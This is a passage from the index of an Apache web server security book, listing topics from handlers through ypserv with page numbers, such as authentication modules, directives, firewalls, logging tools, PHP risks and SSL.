handlers, 584 
AddHandler directive, 584 
default, 585 
request objects, 586 
handling 
dynamic content (modules), 580 
passwords, 310 
user input, 270 
hardware, records, 67 
HEAD method (Limit directives), 472 
header fields (HTTP), 191-193 
access control, 215-217 
IP Authentication Header Protocol, 122 
help, module developing, 466-467 
history, Apache versions, 109-115 
holes (authentication), 253 
hooks (logging), 174-175 
Horst Feistel, 422 
hostnames, hackers, 292 
hosts 
authorizing, 212-213 
blocking, 214 
denying, 214-215 
DoS attacks, 44 
mutual-failure directive, 214-215 
naming, 213 
R services, 48 
virtual, 222 
hosts options (TCP Wrappers), 388 
EXCEPT operator, 388 
housing servers, 58 
htaccess files, 235-237 
htdigest tool, 249-250 
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htgroup files, 237-238 
HTML, PHP code, 273 


htpasswd (Web directory passwords), 
233-235 


databases, 234 
options, 233-235 
syntax, 233-235 
htpasswd tool, 475 
HTTP (proxy servers), 374-379 
authentication, 237-239 
basic security consideration, 20-22 
encryption, 337 
header fields, 191-193 
stateless protocol, 337 
HTTP request methods, limiting, 474 
httpd, status codes, 176-177 
httpd logs, 175 
customizing, 184-185 
HTTPS (proxy servers), 374-379 
httpsd 
startup files, 360 
testing server, 361-362 


IBM AIX VPN firewall , 413 

Icon West Qwest firewall, 414 

IDEA block cipher, 423 

identification systems, 68 

identifying servers, 501 

IdentityCheck directive, 484 
limitations, 484 

Includes option (access control), 220 


inclusive screening, 212-213 


Indexes option (access control), 221 
indexing directories, 221 


Indus River Aurorean Virtual Network fire- 
wall, 414 


Informix, 102-104 
vulnerabilities, 102-104 
innd service, 50 
input (users), 270 
input blocks (DES), 426 
inst_auth_module tool (authentication), 250 
installing 
Apache, 354-355 
Apache-SSL, 349-350 
extension modules, 164 
mod_ssl, 346-348 
Oracle, 96 
integrating Apache (operating systems), 71 
internal commands, user input, 258-259, 261 
internal procedures (PHP), 283-284 
International breaches, 37 
Internet 
biometric identification resources, 65 
credit card data, 337 
resources, 555 
Internet Protocol Version 6. See IPv6 
intruders, 33 
access, 41-43 
gaining access, 33 
unauthorized access, 33 
IP, setting securities, 397 
IP Authentication Header Protocol, 121 
cryptographic schemes, 121 
IP Encapsulating Security Payload, 122-125 


IP filtering, firewall capabilities, 397-401 
IPSEC 
authentication, 122-125 
MDS, 401 
MMC IPSEC Policy snap-in, 399-401 
resources and history, 123 
SHA, 402 
tunneling, 122-125 
IPv6 (Internet Protocol Version 6), 119 
addresses, 125 
anycast, 126 
basic structure, 125-126, 129 
multicast, 126 
prefix-type pairs, 127 
reserved, 126 
unicast, 126 
Apache issues, 128 
authentication, 120 
benefits, 119 
confidentiality, 120 
example implementations, 132-133 
IPSEC, 123 
Listen directive, 132 
NameVirtualHost directive, 132 
resources 
reports, 130-131 
Web sites, 130-131 
security, 120 
VirtualHost directive, 132 
ISAPI, 256 
ISPEC, 397-399, 401 


issues, security breach examples, 505-553 
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J 


Java, 256 
JavaScript, 291 
methods, 298 
objects, 298 
permissions, 298 
Same Origin Policy, 298 
server-side script, 294 
third-party attacks, 299 
Jscript, 291 
JSP, 256 


K 


Kerberos Authentication tool, 250 


klogd daemons, 179 


L 


languages 
ASP, 255 
awk, 255 
C++, 255 
CGI, 255 
client-side programming, 294 
COBOLScript, 255 
ColdFusion, 255 
Flash, 255 
ISAPI, 256 
Java, 256 
JSP, 256 
Perl, 256 
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PHP, 256 

Python, 256 

shell, 256 

support, 255 

TCL, 256 

XML, 256 
laptops, securing, 66 
Last Lines (CGI), 76 

logs, 186 

weakness, 76 
LavaRand (random numbers), 339 
LDAP, 49 


LDAP directory, mod_auth_Idap directive, 
493-494 


liability, third-party servers, 295-297 
Limit directives, 471-472 
LimitExcept directive, 473 
limiting 

child processes CPU resources, 160 

client field size, 486 

client line size, 160 

client request, 485 

client request body, 159 

HTTP request methods, 474 

memory resources, 161 

request fields, 159 

user processes, 161 
LimitRequestBody directive, 159, 485 
LimitRequestFields directive, 159, 485 
LimitRequestFieldsize directive, 486 
LimitRequestFieldssize directive, 160 
LimitRequestLine directive, 160, 486 
LimitXMLRequestBody directive, 486 
line size, limiting, 160 
LINK method (Limit directives), 472 


links, Web resources, 555 
Listen directive, 132 
lists 
bash environment variables, 261-264 
directives, 597-621 
example security issues, 505-553 
testing tools, 286-287 
location 
error logs, 178 
logs, piping, 187, 189-191 
servers, 58 
LOCK method (Limit directive), 472 
LockFile directive, 487 
lockfiles, setting path, 487 
log constants, 171-172 
Log-Dispatch (logging tools), 196 
LogFormat directive, 184-185, 487-488 
logging, 23, 169 
ap_log error function, 170 
ap_log_perror function, 170 
ap_log_rerror function, 171 
blanket, 181 
conditional, 191, 193 
constants (children), 189 
cracker evidence, 170 
customizing, 184-185 
errors, 177-183 
format, 487-488 
hooks, 174-175 
HTTP, 175-176 
httpd logs, 175 
internal holes, 186 
modules, 173-174 
permissions, 185-186 
PID, 169 


routines, 174-175 

SetEvnIf directive, 191-193 

setting format, 484 

syslog, 180-183 

tools, 193, 197 

UID, 169 

users, 169 
logging parameter block, 453 
LogLevel directive (error logs), 184 
logs, 169 

Last Lines, 186 

piped, 187, 189-191 

security, 185-186 
LogSurfer (logging tools), 199 
LOKI91 block cipher, 423 
Ipd service, 50 


Lucent Technologies VPN Firewall Brick 1000, 
414 


Lucifer block cipher, 423 


M 


Mac OS, Apache vulnerabilities, 114 
maintaining 

software upgrades, 116 

employee turnover, 117 
managing permissions (Unix), 78 
mapping 

directives, 155-156 

directories, 143-146 

external programs, 150 

files, 143-146 

mod_alias, 143-146 

mod_rewrite, 143-154 
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mod_spelling, 143 
mod_userdir, 143 
mod_vhost_alias, 143 
URL, 143-148, 150-157 


MDS5 (message digest algorithms), 401, 427, 
482 


MDS authentication, 249-250 
MDS5 Cookie (authentication), 250 
media accessibility, 62-63 
Melissa worm, 83 
memory 

avoiding hackers, 268 

limiting resources, 161 
merging modules, 582 
message digest algorithms, 248-249 

MDS, 482 
message digests, 248-249 
metacharacters (shells), 258 

Unix shells, 76 
methods, 24, 471 

JavaScript, 298 

<Limit> directive, 472 
Microsecure firewall, 416 
Microsoft, breach examples, 38 
Mime-Type modules, 579 
MKCOL method (<Limit> directive), 472 
MMC IPSEC Policy snap-in, 399-401 
mod_access directive, 204-210, 488 
mod_alias (mapping), 144-146 
mod_alias directive (mapping), 143-144 
mod_auth_anon directive, 490 
mod_auth_db directive, 491 
mod_auth_dbm, 239-240, 242-244, 246 
mod_auth_dbm directive, 491 
mod_auth_digest directive, 492 


How can we make this index more useful? Email us at indexes@samspublishing.com 


652 mod_auth directive 


mod_auth directive, 489 

mod_auth external tool (authentication), 250 
mod_auth_ip, 455-456, 458, 460-461 
mod_auth_ldap directive, 493-494 
mod_auth modules, 226-227, 229-230, 232 
mod_auth_mysqI tool (authentication), 251 
mod_auth_nds tool (authentication), 251 
mod_auth_notes tool (authentication), 251 
mod_auth_nt tool (authentication), 251 
mod_auth_ora7 tool (authentication), 251 
mod_auth_ora8 tool (authentication), 251 


mod_auth_oracle/win32 tool (authentica- 
tion), 251 


mod_auth_radius tool (authentication), 251 
mod_auth_samba tool (authentication), 251 
mod_auth_sys tool (authentication), 251 
mod_auth_tacacs tool (authentication), 251 
mod_auth_tds tool (authentication), 251 
mod_auth_yp tool (authentication), 252 
mod_bakery tool (authentication), 252 
mod_cgi directive, 494 
mod_cgid directive, 494 
mod_env directive, 495 
mod_fortress, 402, 405 

example, 436-453 

directives, 405 

plugging in, 449-453 
mod_include directive, 495 
mod_ip forwarding, 405 

directives, 406 

downloading, 406 
mod_LDAPauth tool, 252 
mod_limitipconn, 406 

installing, 406 
mod_log_config directive, 496 


mod_log_mysql (logging tools), 194 
mod_mylog (logging tools), 194 
mod_ntlm tool (authentication), 252 
mod_proxy 

directives, 377 

establishing, 382 

proxy servers, 376-379 
mod_python, 465 
mod_random, 462-464 

examples, 462-464 
mod_relocate tool (logging tools), 194 
mod_rewrite directive (mapping), 143-154 
mod_rpaf, 407 
mod_secureid tool (authentication), 252 
mod_speling directive, 157 

mapping, 143 
mod _ssl, 343 

core source files, 344-346 

installing, 346-348 
mod_suexec directive, 496 
mod_ticket tool (authentication), 252 
mod_tproxy, 408 
mod_unique_id directive, 497 
mod_user_track directive, 497 
mod_userdir directive, 155-156 

mapping, 143 

UserDir directive, 155-156 
mod_vhost_alias directive, mapping, 143 
mod_view (logging tools), 194 
models, 28 
modular design, 27 
modules, 27 

authentication, 579 


content-handling, 435 


developing, 431-432, 436 
examples, 455-461 
mod_fortress example, 436-453 
mod_random, 462-464 
resources, 466-467 

dynamic content, 580 

functions, 436 

intervening, 432 

logging, 173-174 

merging, 582 

Mime-type, 579 

mod_mysql, 91 

mod_python, 465 

plugging in, 449, 451-453 

PostgreSQL, 95-96 

response header, 580 

URI handling, 578 

user access, 579 

MOVE method (<Limit> directive), 472 
mutual-failure directive, 214-215 
MySQL, 89 

client-server model, 90 

independent developers, 90 

modules, 91 

performance, 90-92 

PHP modules, 91-92 


vulnerabilities, 92-94 


N 


NAI PGP Keyserver (permissions examples), 
135 


NameVirtualHost directive, 132 


networks 653 


naming 
functions, 292-293 
hosts, 213 
variables, 292-293 
naming conventions, 292-293 
National Bureau of Standards (DES), 425 
NCB (Network Control Block), 51 
NDBM files, 239-246 
generating, 150 


NETBEUI (NetBIOS Extended User Interface), 
53 


NETBIOS, 51 

commands, 52 
Netlog (logging tools), 199 
Netscape, SSL breach, 338 


Netscreen Security Systems Netscreen 1000 
firewall, 415 


network components, 59 
network access control, 203 

access.conf, 211-212 
Network Associates Gauntlet 6.0 firewall, 415 
Network Control Block Fields, 52 
Network Control Block. See NCB 
Network File System. See NFS 
network operations center (NOC), 58 
network topology, 59 

electronic eavesdropping, 59 

fault tolerance, 59 

single point of failures, 59 
network-level firewalls, 372 
networks 

access control, 24 

buffer size, 499 

layout, 59 


trust relationships, 117 
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NFS (Network File System), 47-48 
remote users, 47-48 
NOC (network operations center), 58 
establishing, 58 
NOCOL/NetConsole v4.0 (logging tools), 199 
NoProxy directive (mod_proxy), 378 


O 


objects (JavaScript), 298 
octal system (Unix permissions), 139 
open source, 305 
open source applications, 25 
Open Source Databases, MySQL, 89 
open(), 264-265 
OpenSSL, compiling, 350-353 
operating systems, 69 

80/20 rule, 73-74 

choosing, 70-73 

developing, 70-73 

integrating Apache, 71 

security, 73-74 

server functions, 70-73 

server integration, 70-73 

tech support, 70-73 

Unix, 75-76 

Windows, 79-85 
operators, hosts options, 388 
options, apxs tools, 165-166 
OPTIONS method (<Limit> directives), 472 
Oracle, 96 

Apache tools, 100-102 

default accounts, 97 


vulnerabilities, 97-99 


ownership 
Unix, 136 
Windows, 140-141 


P 


packets 

analyzing, 371 

filtering (firewalls), 372 

IPSEC, 123 
padding (DES), 426 
PAM Auth tool (authentication), 252 
parent process ID. See PPID 
parselog (logging tools), 195 
PassEnv directive, 497 
passwords 

Anonymous directive, 476 


Anonymous_MustGiveEmail directives, 
478 


authentication, 225, 238-239 
HTTP, 238-239 

BIOS, 60 

console, 60 

directories, 233-235 

encryption, 42 

files, 305, 310 

protecting, 475 

routines, 310 

storing, 246-247 

using e-mail addresses, 477-478 
patch maintenance, 116 
PATCH method (<Limit> directive), 472 
patching Apache, 354-355 


paths 
avoiding risks, 294 
CGI, 271-273 
hackers, 292-294 
relative, 271-273 
server-side code, 294 
patterns, random numbers, 338, 340, 342 
performance 
MySQL, 90-92 
tracking, 161 
Perl, 256 
chdir(), 273 
eval, 266 
exec(), 266 
open(), 264-265 
proxy tools, 409 
random numbers, 341-342 
permissions, 135 
basic concepts, 136 
importance, 135 
JavaScript, 298 
logging, 185-186 
Unix, 78, 136 
adding, 138 
assigning, 138 
changing, 138 
chmod, 138 
Execute, 136 
octal system, 139 
owners, 138 
Read, 136 
tokens, 136 
Write, 136 


PPID (parent process ID) 655 


Windows, 136, 140-141 
ACL, 141 
changing, 141-142 
permutations (DES), 426 
PHP, 256, 273 
disable functions, 279-281 
environment, 275, 278 
escapeshellarg(), 282 
escapeshellcmb(), 282 
internal procedures, 283-284 
remote attackers, 282 
risks, 274-282 
safe mode, 278-279 
directives, 279 
establishing, 278-279 
PHP modules, MySQL, 91-92 
physical security, 57 
common threats, 57 
NOC, 58 
server location, 58 
PID (process ID), 340, 342 
PidFile directive, 498 
piggybacking, system() call, 258 
PingLogger (logging tools), 199 
piping logs, 187-191 
constants, 189 
popen(), 260 
avoiding, 260 
portmap service, 50 
POST method (<Limit> directive), 472 
PostgreSQL, 95 
modules, 95-96 
tools, 95-96 
PPID (parent process ID), 340-342 
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preferences (users), 497 
preventing 
metacharacters (PHP), 282 
with testing tools, 286-287 
process ID. See PID 
process models, 431-432 
programming 
committing functions, 285-286 
PHP, 274-278 
server-side, 256-257 
tools, 286-287 
programming errors, 255 
programming practices, security, 88-89 
PROPFIND method (<Limit> directive), 473 
PROPPATCH method (<Limit> directive), 473 
proprietary databases, 88-89 
protecting 
directories, 233-235 
passwords, 475 
protocol, blocking, 371 
proxy control, 24 
proxy servers (Apache as firewall), 374-379 
establishing, 382 
mod_proxy, 376-379 
proxy tools, 402 
mod_fortress, 402, 405 
mod_ip forwarding, 405 
mod_limitipconn, 406 
mod_rpaf, 407 
mod_tproxy, 408 
Web resources, 409 
ProxyBlock directive, 498 
mod_proxy, 378 


ProxyDomain directive, 498 
mod_proxy, 379 
ProxyErrorOverrid directive (mod_proxy), 379 


ProxyMaxForwards directive (mod_proxy), 
379 


ProxyPass directive (mod_proxy), 379 
ProxyPassReverse directive (mod_proxy), 380 


ProxyPreserveHost directive (mod_proxy), 
380 


ProxyReceiveBufferSize directive, 499 
mod_proxy, 380 
ProxyRemote directive, 499 
mod_proxy, 380 
ProxyRequest directive (mod_proxy), 381 
ProxyRequests directive, 499 
ProxyTimeout directive (mod_proxy), 381 
ProxyVia (mod_proxy), 381 
ProxyVia directive, 499 
public key cryptography, 338 
PUT method (<Limit> directive), 473 
Python, 256 


Q 


quick reference, Apache API, 575-594 


R 


R services, 48 
rexecd, 48 
rlogind, 48 
rshd, 48 

rand(), 341 


random numbers, 338-342 

C, 343 

LavaRand, 339 

Perl, 341-342 
RC2 block cipher, 423, 426 
read permissions (Unix), 136 
RealAudio, 49 
recompiling Apache, 382 
records, hardware, 67 
Red Creek Ravlin 7160 firewall, 416 
Redirect directive, 145 
redirection, URL, 143-146 
RedirectMatch directive, 145 
reference (HTTP status codes), 176-177 
rejecting user authentication, 226-232 
relative paths, 271-273 
remote attackers (PHP), 282 
remote proxies, 499 
remote users, NFS, 47-48 
removing permissions (Unix), 138 


replays, IP Authentication Header Protocol, 
121 


request objects, 586 
requests, satisfying, 576-578 
resource allocation, 586-588 
clean up, 587 
resources 
biometric identification, 65 
block ciphers, 422-424 
breach statistics, 34-40 
CGI, 288 
controlling, 157-161 
IPv6, 130-131 


memory, 161 


risks 657 


module developing, 466-467 
source tree, 335 
Web, 555 
response header modules, 580 
restricting 
resources, 157-161 
user access, 42 
virtual hosts, 222 
retinal scans, 64-65 
choroid layer, 64-65 
cones, 64-65 
RewriteBase directive, 151 
RewriteCond directive, 151 
triggers, 152-154 
RewriteEngine directive, 148 
RewriteLock directive, 149 
RewriteLog directive, 148 
RewriteLogLevel directive, 149 
RewriteMap directive, 149 
RewriteOptions directive, 148 
RewriteRule directive, 154 
flags, 155 
rexecd service (Remote Execution Server), 48 
risks, 33 
AOL Instant Messenger, 49 
Apache history, 111-115 
CGI 
code, 257 
environment, 257 
tools, 257 
code, 33 
defacement, 45 
executing shell commands, 258-261 


exposed source code, 292-294 
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internal commands with user input, 
258-261 


intruders, 33 
LDAP, 49 
NFS (Network File System), 47-48 
PHP, 274-284 
RealAudio, 49 
shells, 260 
SMB, 56 
total system seizure, 45 
Unix shells, 75-76 
user input, 281-282 
Web server, 49 
Windows, 79-85 
writing paths, 294 
Yahoo! Messenger, 49 
RLimitCPU directive, 160 
RLimitMEM directive, 161 
RLimitNPROC directive, 161 
rlogind service (Remote Login Server), 48 
root directory, specifying location, 501 
ROT-13, 420 
router-based firewalls, 373 
routers, firewall, 371 
routines (logging), 174-175 
passwords, 310 
RSA authentication, 337 
rshd service (Remote Shell server), 48 
rules 
firewalls, 372 
syslog, 180-183 


S 


safe mode (PHP), 278-279 
establishing, 278-279 
SAFER block cipher, 424 
Same Origin Policy, 298 
satisfying requests, 576, 578 
screening user input, 281-282 
ScriptAlias directive, 146 
ScriptAliasMatch directive, 146 
Secure Root, breach example, 35 
Secure Sockets Layer. See SSL 
securing laptops, 66 
security, 471 
AccessFileName directive, 475 
accounting, 23 
anonymous users, 490 
AuthAuthoritative, 479 
authorizing information, 481 
basic security considerations, 23 
BIOS passwords, 60-61 
breaches, development, 41-43 
CGI, 257, 496 
CSI breach statistics, 34-40 
databases, 29, 104 
example issues, 505-553 
files, 305, 311-313 
Informix, 102-104 
IPv6, 128 
<Limit> directive, 471-472 
<LimitExcept> directive, 473 
logging, 23, 197 
MySQL, 92-94 
operating systems, 73-74 
Oracle, 97-99 


passwords, 476 

physical, 57 

proprietary databases, 88-89 

source tree, 305-309 

user input, 270 

<VirtualHost> directive, 474 

Web resources, 555 
Security Descriptor (SID), 140-141 
serialization, child processes, 158 
SERVER_BUSY_LOG constant, 172 
server tools 

ab, 161-162 

apachectl, 161 

apxs, 161 

suexec, 161 
server-side code, paths, 294 
server-side programming, 256-257 
ServerAdmin directive, 500 
ServerAlias directive, 500 
ServerName directive, 501 
ServerPath directive, 501 
ServerRoot directive, 501 
servers 

applications, 586, 588 

basic security considerations, 23 

client-side programming risks, 295 

housing, 58 

identifying, 501 

location, 58 

physical location, 58 

server-side programming, 256-257 

testing (httpsd), 361-362 
ServerSignature directive, 502 
services, 28, 49-50 
SetEnvlf directive, 191, 193 
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setting 
cookie time frames, 483 
error log location, 178 
stack size, 161 
URL path, 501 
user ID, 502 
Windows IP security, 397 
SHA, 402 
shell languages, 256 
shells (Unix), 75-76 
avoiding functions, 257 
common metacharacters, 258 
environment, 261-264 
environment variables, 76-77 
eval, 266 
metacharacters, 76 
piggybacking, 258 
popen(), 260 
security, 260 
system(), 258-259, 261 
SID (Security Descriptor), 140-141 
signatures (attacks), 372 
sites, Web resources, 555 
SMB (Server Message Block Protocol), 53 
risks, 56 
smbd service, 50 
SOCKS (proxy servers), 374-379 
software 
open source, 26 
patch maintenance, 116 
permissions, 136 
source code 
exposed, 292-294 
mod_auth_ip example, 455-461 
mod_fortress example, 436-453 
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source files 
Apache C, 312, 314 
mod_ssl, 344-346 
source tree, 305, 335 
security contexts, 305-309 
sources, committing functions, 285-286 
specifying 
administrative e-mail address, 500 
memory resources, 161 
root directory location, 501 
spelling, URL auto-corrects, 157 
split-logfile, log vulnerability, 186 
SQUARE block cipher, 424 
srand (), 341 
SSI (Server-Side includes), 495 
access control, 220 
support, 495 
SSL (Secure Sockets Layer), 337, 427 
commercial packages, 368-369 
DES, 337 
directives, 347-348 
installing, 346-348 
mod_ssl, 343 
Netscape breach, 338 
PID, 340, 342 
PPID, 340, 342 
random numbers, 338-342 
RSA, 337 
vulnerability, 340, 342 
SSL authentication, 250 
client certificates, 250 
SSLeay, 350-353 
optimization flags, 353 
startup, xinetc, 391 
startup files, httpsd, 360 


stateless, 20 
statistics, Computer Security Institute, 34-40 
status codes (http), 176-177 
storing 
errors, 177-183 
httpd process ID, 498 
passwords (HTTP authentication), 246-247 
usernames (HTTP authentication), 246-247 
substitution ciphers, 420-421 
ROT-13, 420 
suexec tool, 161, 166 
support 
anonymous users, 23 
databases, 87 
supported ciphers, 428 
supporting languages, 255 
Swatch (logging tools), 198 
Symantec Enterprise VPN firewall, 416 
symbolic links (access control), 219 
syslog 
customizing, 180-183 
rules, 180-183 
syslogd daemons, 179 
system(), 258-261 
piggybacking, 258 
systems 
defacement, 45-46 
total seizure, 45-46 


unique identification, 67 


T 


TASC, breach example, 35 
tasks, files, 311-313 


Tcl, 256 
TCP Wrapper 
tcpdchk tool (configuration checker), 389 
tcpdmatch tool, 390 
TCP Wrappers, 383-387 
comparing with firewalls, 390 
hosts options 
EXCEPT operator, 388 
wildcards, 388 


tcpdchk (TCP Wrapper configuration 
checker), 389 


tcpdmatch tool (TCP Wrapper), 390 
TEA block cipher, 424 
tech support, operating systems, 70-73 
templates, 27 
testing 

access, 210 

code, 286-287 

servers (httpsd), 361-362 
testing tools, 286-287 
third-party servers 

client-side security, 295-297 

cross-site scripting, 296-297 

JavaScript attacks, 299 
threads, stack sizes, 161 
ThreadStackSize directive, 161 
Tim Berners-Lee, 19 
time-based access, 217-218 
tokens (Unix permissions), 136 
TomCat 3.2.3, 110 
tools 

ab, 161-162 

access control, 383 

TCP Wrappers, 385-387 
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apachectl, 164 
htpasswd, 233-235 
logging, 193, 197 
Oracle, 100-102 
PostgreSQL, 95-96 
programming, 286-287 


tcpdchk (TCP Wrapper configuration 
checker), 389 


testing, 286-287 
topology. See network topology 
TRACE method (Limit directive), 473 
tracking 

cookies, 483 

performance, 161 

piped logs, 189 

user ID, 484 

user preferences, 497 
transactions, examples, 575 
transformations (DES), 426 
triggers, RewriteCond directive, 152-154 


Trusted Information Systems (TIS), firewalls, 
373 


tunneling IPSEC, 122-125 


U 


unauthorized access, 33, 41 
unique identification, 67 
Unix 
complexities, 78 
ownership, 136 
permissions, 78, 136 
adding, 138 
changing, 138 
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chmod, 138 
execute, 136 
group, 138 
octal system, 139 
owners, 138 
read, 136 
removing, 138 
tokens, 136 
write, 136 

risks, 75-76 

shells, environment variables, 76-77 


xinetc (eXtended InterNET services dae- 
mon), 390-391 


xinetd, 393-396 
UNLINK method (<Limit> directive), 473 
UNLOCK method (<Limit> directive), 473 
unpacking 
Apache, 354-355 
SSL, 350-353 
updating 
Apache, 109-110 
DBM files, 246-247 
URI handling, examples, 576, 578 
URL 
mapping, 143-157 
redirection, 143-146 
spelling correction, 157 
user access, 579 
user authentication, htpasswd, 234 
User directive, 502 
user ID, tracking, 484 
UserDir directive, 155-156, 503 


usernames, storing, 246-247 


users 
authentication, 25, 225-232 
buffer overruns, 267-270 
computer security, 295-297 
constructing commands with, 258-261 
denying access, 203 
finger directive, 47 
hackers, 270 
ID, setting, 502 
IDs, 579 
input, 270 
screening, 281-282 
validating, 281-282 
network access control, 203 
passwords, 42 
preferences, tracking, 497 
restricting access, 42 
tracking, 25 
utilities, dbmmanage, 246-247 


V 


validating 
e-mail passwords, 479 
user input, 281-282 
variable names, hackers, 292-293 
VBScript, 291, 300 
frame security, 301 
verifying 
e-mail passwords, 478-479 
user authentication, 226-232 
virtual hosts, 222 
<VirtualHost> directive, 132, 474 


viruses (Windows), 82 


vulnerabilities 
Informix, 102-104 
MySQL, 92-94 
Oracle, 97-99 


W 


W2K (Windows 2000), 397-401 
Watcher (logging tools), 199 
weaknesses, HTTP authentication, 238-239 
Web 
block cipher information, 422 
communications, 337 
database interaction, 256 
encryption, 338 
firewall vendors, 417-418 
proxy tool links, 409 
resources, 288, 555 
SSL, 337 
Web resources, biometric identification, 65 
Web servers 
basic, 23 
risks, 49 
wildcards, hosts options, 388 
Windows 
DoS vulnerabilities, 83-85 
environment variables, 79-85 
firewall capabilities, 397-401 
NETBEUI, 53 
NETBIOS, 51 
ownership, 140-141 
permissions, 136, 140-141 
changing, 141-142 
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setting IP security, 397 

SMB, 53 

viruses, 82 

worms, 82 
WINNT.H (Windows permissions), 140-141 
workstations, anti-theft devices, 67 
worms 

Melissa, 83 

Windows, 82 
write permissions (Unix), 136 
writing 

server applications, 586, 588 
WWW. See Web 


X 


xcacls (Windows permissions), 141-142 
access masks, 142 
arguments, 142 
options, 142 


xinetc (eXtended InterNET services daemon), 
390-391 


xinetd 
attributes, 393-396 
configuring, 392 
startup options, 391 

XML, 256 

XOR (exclusive-or), 422 


Y 


Yahoo! Messenger, 49 
ypbind service, 50 


ypserv service, 50 
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